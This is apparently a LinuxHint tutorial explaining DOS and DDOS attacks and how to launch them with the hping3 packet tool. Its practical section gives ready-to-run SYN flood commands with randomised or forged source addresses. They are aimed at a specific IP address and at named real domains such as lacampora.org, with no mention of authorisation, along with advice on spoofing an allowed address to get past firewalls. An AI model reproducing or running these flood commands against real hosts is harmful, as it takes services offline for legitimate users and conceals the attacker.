Security

hping3 flood ddos

This tutorial focuses on DDOS (Distributed Denial of Service) attacks using the hping3 tool. If you are already familiarized with DOS (Denial of Service) and DDOS attacks you can continue reading from the hping3 practical instructions, otherwise it is recommended to learn about how these attacks work.

DOS Attacks

A denial of Service (DOS) attack is a very simple technique to deny accessibility to services (that’s why it is called “denial of service” attack). This attack consists of overloading the target with oversized packets, or a big quantity of them.

While this attack is very easy to execute, it does not compromise the information or privacy of the target, it is not a penetrative attack and only aims to prevent access to the target.
By sending a quantity of packets the target can’t handle attackers prevent the server from serving legitimate users.

DOS attacks are carried out from a single device, therefore it is easy to stop them by blocking the attacker IP, yet the attacker can change and even spoof (clone) the target IP address but it is not hard for firewalls to deal with such attacks, contrary to what happens with DDOS attacks.

DDOS Attacks

A Distributed Denial of Service attack (DDOS) is similar to a DOS attack but carried out from different nodes (or different attackers) simultaneously. Commonly DDOS attacks are carried out by botnets. Botnets are automated scripts or programs which infect computers to carry out an automated task (in this case a DDOS attack). A hacker can create a botnet and infect many  computers from which  botnets will launch DOS attacks, the fact many botnets are shooting simultaneously turn the DOS attack into a DDOS attack (that’s why it is called “distributed”).

Of course, there are exceptions in which DDOS attacks were carried out by real human attackers, for example the hackers group Anonymous integrated by thousands of people worldwide used this technique very frequently due its easy implementation (it only required volunteers who shared their cause), that’s for example how Anonymous left Gaddafi’s Libyan government completely disconnected during the invasion, the Libyan state was left defenseless before thousands of attackers from worldwide.

This type of attacks, when carried out from many different nodes is extremely difficult to prevent and stop and normally require special hardware to deal with, this is because firewalls and defensive applications aren’t prepared to deal with thousands of attackers simultaneously. This is not the case of hping3, most of attacks carried out through this tool will be blocked by defensive devices or software, yet it is useful in local networks or against poorly protected targets.

About hping3

The tool hping3 allows you to send manipulated packets. This tool allows you to control the size, quantity and fragmentation of packets in order to overload the target and bypass or attack firewalls. Hping3 can be useful for security or capability testing purposes, using it you can test firewalls effectivity and if a server can handle a big amount of packets. Below you will find instructions on how to use hping3 for security testing purposes.

Getting started with DDOS attacks using hping3:

On Debian and based Linux distributions you can install hping3 by running:

# apt install hping3 -y

A simple DOS (not DDOS) attack would be:

# sudo hping3 -S --flood -V -p 80 170.155.9.185

Where:
sudo: gives needed privileges to run hping3.
hping3:
calls hping3 program.
-S: specifies SYN packets.
–flood: shoot at discretion, replies will be ignored (that’s why replies wont be shown) and packets will be sent fast as possible.
-V: Verbosity.
-p 80: port 80, you can replace this number for the service you want to attack.
170.155.9.185: target IP.

Flood using SYN packets against port 80:

The following example portrays a SYN attack against lacampora.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Where:
Lacampora.org: is the target
-q: brief output
-n: show target IP instead of host.
-d 120: set packet size
–rand-source: hide IP address.

The following example shows another flood possible example:

SYN flood against port 80:

# sudo hping3 --rand-source ivan.com -S -q -p 80 --flood

With hping3 you can also attack your targets with a fake IP, in order to bypass a firewall you can even clone your target IP itself, or any allowed address you may know (you can achieve it for example with Nmap or a sniffer to listen established connections).

The syntax would be:

# sudo hping3 -a <FAKE IP> <target> -S -q -p 80 --faster -c2

In this practical example the attack would seem:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --faster -c2

I hope you found this tutorial on hping3 useful. Keep following LinuxHint for more tips and updates on Linux and networking.

About the author

Ivan Vanney

Ivan Vanney

Ivan Vanney has over 2 years as writer for LinuxHint, he is co-founder of the freelance services marketplace GIGopen.com where he works as a sysadmin.